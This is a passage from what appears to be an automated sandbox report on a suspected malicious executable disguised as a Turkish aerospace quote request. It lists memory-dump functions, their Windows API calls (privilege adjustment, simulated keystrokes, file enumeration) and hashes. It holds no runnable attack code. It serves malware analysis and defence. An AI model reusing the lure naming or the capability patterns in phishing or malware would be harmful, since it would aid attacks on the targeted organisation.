                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ClearVariant
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1473721057-0
                                                                                                                                    • Opcode ID: 7151055c6db33059c6de199c1efec11c73f4197a826950a6c9412121ef2ea657
                                                                                                                                    • Instruction ID: ba7f12f455bd979bfe991b1294d35f43cbeec5ef03bcfee66b8163a6f266ae58
                                                                                                                                    • Opcode Fuzzy Hash: 7151055c6db33059c6de199c1efec11c73f4197a826950a6c9412121ef2ea657
                                                                                                                                    • Instruction Fuzzy Hash: BA2128B4908342DFDB24DF64C444B1ABBE1BF85314F05896CF88957762D735E809EB52
                                                                                                                                    APIs
                                                                                                                                    • __lock_file.LIBCMT ref: 00FC48A6
                                                                                                                                      • Part of subcall function 00FC8B28: __getptd_noexit.LIBCMT ref: 00FC8B28
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __getptd_noexit__lock_file
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2597487223-0
                                                                                                                                    • Opcode ID: 72d37ac8a1dba33d021e90435bcbc25204ed89934f86894ab6b436411e96c494
                                                                                                                                    • Instruction ID: 4193bd760e2fdcf41ae8f61189b265c1af3ac74fc316dfa2a90dad0097fcb0d7
                                                                                                                                    • Opcode Fuzzy Hash: 72d37ac8a1dba33d021e90435bcbc25204ed89934f86894ab6b436411e96c494
                                                                                                                                    • Instruction Fuzzy Hash: 65F0AF3190160BEBDF11AFA48E07FAE36A0AF10376F15841CB8249A1D1CB7C9952FB51
                                                                                                                                    APIs
                                                                                                                                    • FreeLibrary.KERNEL32(?,?,010652F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00FA4E7E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3664257935-0
                                                                                                                                    • Opcode ID: 0288db6ac8b28077c2530a5bb096c8be7f4246dfab3942125693659b2a694f3d
                                                                                                                                    • Instruction ID: aa7a5c94f1d965d2e59451124a1292d8f2bfebf06224fd647b6883fb6ffc72d6
                                                                                                                                    • Opcode Fuzzy Hash: 0288db6ac8b28077c2530a5bb096c8be7f4246dfab3942125693659b2a694f3d
                                                                                                                                    • Instruction Fuzzy Hash: D8F039B1901712CFCB349F64E4D4812BBF5BF963793208A3EE1D682610C7B2A880EF40
                                                                                                                                    APIs
                                                                                                                                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00FC07B0
                                                                                                                                      • Part of subcall function 00FA7BCC: _memmove.LIBCMT ref: 00FA7C06
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: LongNamePath_memmove
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2514874351-0
                                                                                                                                    • Opcode ID: e74a3f2db7de7e65743ccadef0af677b22f30cc14c0baa28b7fada755257f001
                                                                                                                                    • Instruction ID: b2e0b5136b76bcfcc9ef7f414eaadf5ac5813d497ae0bf6632417b52ae861629
                                                                                                                                    • Opcode Fuzzy Hash: e74a3f2db7de7e65743ccadef0af677b22f30cc14c0baa28b7fada755257f001
                                                                                                                                    • Instruction Fuzzy Hash: B7E0867690422857C720A5989C05FEA77ADDB896A0F0441B6FC08D7208D9659C948691
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __fread_nolock
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2638373210-0
                                                                                                                                    • Opcode ID: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                                                                                                    • Instruction ID: c7751e39f082deacf9ddc5725894e1c5f5d5d234e51c020065c4271ee66983cd
                                                                                                                                    • Opcode Fuzzy Hash: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                                                                                                    • Instruction Fuzzy Hash: 8AE092B0504B405BE7398A28D801BA377E1BB05304F04085DF2EA83242EBA278418759
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __wfsopen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 197181222-0
                                                                                                                                    • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                                                    • Instruction ID: 363b54cac752c7292ea1e70bc9b8d1e9f05555b38f198dc4e87b9e4d82140d63
                                                                                                                                    • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                                                    • Instruction Fuzzy Hash: 2EB0927644020C77CE012A82EC03F897B599B42BA4F408020FB0C18162A677A6A4AA89
                                                                                                                                    APIs
                                                                                                                                    • Sleep.KERNELBASE(000001F4), ref: 01260849
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1492167049.000000000125E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0125E000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_125e000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Sleep
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3472027048-0
                                                                                                                                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                                    • Instruction ID: 9c038a71ac94c079b5cf1afd336b9247957b97cf7465039c2950c4e11174376d
                                                                                                                                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                                    • Instruction Fuzzy Hash: 0BE0E67494020DDFDB00DFF4D54969D7BB4EF04301F100161FD01D2280D6309D50DA62
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00FA2612: GetWindowLongW.USER32(?,000000EB), ref: 00FA2623
                                                                                                                                    • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0102CB37
                                                                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0102CB95
                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0102CBD6
                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0102CC00
                                                                                                                                    • SendMessageW.USER32 ref: 0102CC29
                                                                                                                                    • _wcsncpy.LIBCMT ref: 0102CC95
                                                                                                                                    • GetKeyState.USER32(00000011), ref: 0102CCB6
                                                                                                                                    • GetKeyState.USER32(00000009), ref: 0102CCC3
                                                                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0102CCD9
                                                                                                                                    • GetKeyState.USER32(00000010), ref: 0102CCE3
                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0102CD0C
                                                                                                                                    • SendMessageW.USER32 ref: 0102CD33
                                                                                                                                    • SendMessageW.USER32(?,00001030,?,0102B348), ref: 0102CE37
                                                                                                                                    • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0102CE4D
                                                                                                                                    • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0102CE60
                                                                                                                                    • SetCapture.USER32(?), ref: 0102CE69
                                                                                                                                    • ClientToScreen.USER32(?,?), ref: 0102CECE
                                                                                                                                    • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0102CEDB
                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0102CEF5
                                                                                                                                    • ReleaseCapture.USER32 ref: 0102CF00
                                                                                                                                    • GetCursorPos.USER32(?), ref: 0102CF3A
                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 0102CF47
                                                                                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0102CFA3
                                                                                                                                    • SendMessageW.USER32 ref: 0102CFD1
                                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0102D00E
                                                                                                                                    • SendMessageW.USER32 ref: 0102D03D
                                                                                                                                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0102D05E
                                                                                                                                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0102D06D
                                                                                                                                    • GetCursorPos.USER32(?), ref: 0102D08D
                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 0102D09A
                                                                                                                                    • GetParent.USER32(?), ref: 0102D0BA
                                                                                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0102D123
                                                                                                                                    • SendMessageW.USER32 ref: 0102D154
                                                                                                                                    • ClientToScreen.USER32(?,?), ref: 0102D1B2
                                                                                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0102D1E2
                                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0102D20C
                                                                                                                                    • SendMessageW.USER32 ref: 0102D22F
                                                                                                                                    • ClientToScreen.USER32(?,?), ref: 0102D281
                                                                                                                                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0102D2B5
                                                                                                                                      • Part of subcall function 00FA25DB: GetWindowLongW.USER32(?,000000EB), ref: 00FA25EC
                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0102D351
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                                                                    • String ID: @GUI_DRAGID$F
                                                                                                                                    • API String ID: 3977979337-4164748364
                                                                                                                                    • Opcode ID: f7bc45082040a00fb99d23a72a430dc53bb3c1c5938545b30aedeb1bdf2e070e
                                                                                                                                    • Instruction ID: 48e950545c859bc1963fe4bf84ca187b1b0a1c35bcaa9f720bf38efd7cba2c9c
                                                                                                                                    • Opcode Fuzzy Hash: f7bc45082040a00fb99d23a72a430dc53bb3c1c5938545b30aedeb1bdf2e070e
                                                                                                                                    • Instruction Fuzzy Hash: D542DC78204291AFE731CF28C948EAABFE5FF49350F140549FAD5872A1C736D844EB92
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _memmove$_memset
                                                                                                                                    • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                                                                                                                    • API String ID: 1357608183-1798697756
                                                                                                                                    • Opcode ID: 7c48447fc232a9e774518daca45066d242d01dc67aac5cd4c8daaa4c46625858
                                                                                                                                    • Instruction ID: 138e46244e7028bdb29ff0dca188d5a37ef0283affc52ee9ce78dd16fb2153fd
                                                                                                                                    • Opcode Fuzzy Hash: 7c48447fc232a9e774518daca45066d242d01dc67aac5cd4c8daaa4c46625858
                                                                                                                                    • Instruction Fuzzy Hash: CD93A275E04219DBDB24DF98C881BFDB7B1FF48720F24816ADA45AB290E7749D81EB40
                                                                                                                                    APIs
                                                                                                                                    • GetForegroundWindow.USER32(00000000,?), ref: 00FA48DF
                                                                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00FDD665
                                                                                                                                    • IsIconic.USER32(?), ref: 00FDD66E
                                                                                                                                    • ShowWindow.USER32(?,00000009), ref: 00FDD67B
                                                                                                                                    • SetForegroundWindow.USER32(?), ref: 00FDD685
                                                                                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00FDD69B
                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00FDD6A2
                                                                                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00FDD6AE
                                                                                                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 00FDD6BF
                                                                                                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 00FDD6C7
                                                                                                                                    • AttachThreadInput.USER32(00000000,?,00000001), ref: 00FDD6CF
                                                                                                                                    • SetForegroundWindow.USER32(?), ref: 00FDD6D2
                                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FDD6E7
                                                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 00FDD6F2
                                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FDD6FC
                                                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 00FDD701
                                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FDD70A
                                                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 00FDD70F
                                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FDD719
                                                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 00FDD71E
                                                                                                                                    • SetForegroundWindow.USER32(?), ref: 00FDD721
                                                                                                                                    • AttachThreadInput.USER32(?,?,00000000), ref: 00FDD748
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                                    • String ID: Shell_TrayWnd
                                                                                                                                    • API String ID: 4125248594-2988720461
                                                                                                                                    • Opcode ID: 65a793e76e6e3503d33df1893da860f9af8baa3855ff6d4bde8b3ee9112265fe
                                                                                                                                    • Instruction ID: 716a17aa21a04e3d9e0f08bcb161fa7af6068a62e6f61346a88c5365c7d5dccd
                                                                                                                                    • Opcode Fuzzy Hash: 65a793e76e6e3503d33df1893da860f9af8baa3855ff6d4bde8b3ee9112265fe
                                                                                                                                    • Instruction Fuzzy Hash: 61317271A40318BAEB316F619C49F7F7F7DEB44BA0F244066FA04EA1C1C6B55900ABA0
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00FF87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00FF882B
                                                                                                                                      • Part of subcall function 00FF87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00FF8858
                                                                                                                                      • Part of subcall function 00FF87E1: GetLastError.KERNEL32 ref: 00FF8865
                                                                                                                                    • _memset.LIBCMT ref: 00FF8353
                                                                                                                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00FF83A5
                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00FF83B6
                                                                                                                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00FF83CD
                                                                                                                                    • GetProcessWindowStation.USER32 ref: 00FF83E6
                                                                                                                                    • SetProcessWindowStation.USER32(00000000), ref: 00FF83F0
                                                                                                                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00FF840A
                                                                                                                                      • Part of subcall function 00FF81CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00FF8309), ref: 00FF81E0
                                                                                                                                      • Part of subcall function 00FF81CB: CloseHandle.KERNEL32(?,?,00FF8309), ref: 00FF81F2
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                                                                    • String ID: $default$winsta0
                                                                                                                                    • API String ID: 2063423040-1027155976
                                                                                                                                    • Opcode ID: f70fe68543bdfbd91d8c8e9425642dd78304f0c8817c1679e0e9539d0adfebd1
                                                                                                                                    • Instruction ID: 343d42f2dfeac4226da4466b4da05c3b8b292da78cc2ee490f5d08e77a6c599f
                                                                                                                                    • Opcode Fuzzy Hash: f70fe68543bdfbd91d8c8e9425642dd78304f0c8817c1679e0e9539d0adfebd1
                                                                                                                                    • Instruction Fuzzy Hash: 48814B7190020DAFDF219FA4DC45AFE7B79FF083A4F284159FA50A6161DB358E16EB20
                                                                                                                                    APIs
                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0100C78D
                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0100C7E1
                                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0100C806
                                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0100C81D
                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0100C844
                                                                                                                                    • __swprintf.LIBCMT ref: 0100C890
                                                                                                                                    • __swprintf.LIBCMT ref: 0100C8D3
                                                                                                                                      • Part of subcall function 00FA7DE1: _memmove.LIBCMT ref: 00FA7E22
                                                                                                                                    • __swprintf.LIBCMT ref: 0100C927
                                                                                                                                      • Part of subcall function 00FC3698: __woutput_l.LIBCMT ref: 00FC36F1
                                                                                                                                    • __swprintf.LIBCMT ref: 0100C975
                                                                                                                                      • Part of subcall function 00FC3698: __flsbuf.LIBCMT ref: 00FC3713
                                                                                                                                      • Part of subcall function 00FC3698: __flsbuf.LIBCMT ref: 00FC372B
                                                                                                                                    • __swprintf.LIBCMT ref: 0100C9C4
                                                                                                                                    • __swprintf.LIBCMT ref: 0100CA13
                                                                                                                                    • __swprintf.LIBCMT ref: 0100CA62
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                                                                                    • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                                                    • API String ID: 3953360268-2428617273
                                                                                                                                    • Opcode ID: ca35dec9951b1c07f7cae43fa449c72071723845c95491dd1d9b09e09abd3f22
                                                                                                                                    • Instruction ID: 931bfea6bd61ae1e48b98c006d44b33fcf81b961295475ec45ac8ecb3667b870
                                                                                                                                    • Opcode Fuzzy Hash: ca35dec9951b1c07f7cae43fa449c72071723845c95491dd1d9b09e09abd3f22
                                                                                                                                    • Instruction Fuzzy Hash: 97A14DB1408305ABD710EFA4CD86DAFB7ECFF86704F40492DF58586191EA78DA08DB62
                                                                                                                                    APIs
                                                                                                                                    • FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 0100EFB6
                                                                                                                                    • _wcscmp.LIBCMT ref: 0100EFCB
                                                                                                                                    • _wcscmp.LIBCMT ref: 0100EFE2
                                                                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 0100EFF4
                                                                                                                                    • SetFileAttributesW.KERNEL32(?,?), ref: 0100F00E
                                                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0100F026
                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0100F031
                                                                                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 0100F04D
                                                                                                                                    • _wcscmp.LIBCMT ref: 0100F074
                                                                                                                                    • _wcscmp.LIBCMT ref: 0100F08B
                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0100F09D
                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(01058920), ref: 0100F0BB
                                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 0100F0C5
                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0100F0D2
                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0100F0E4
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
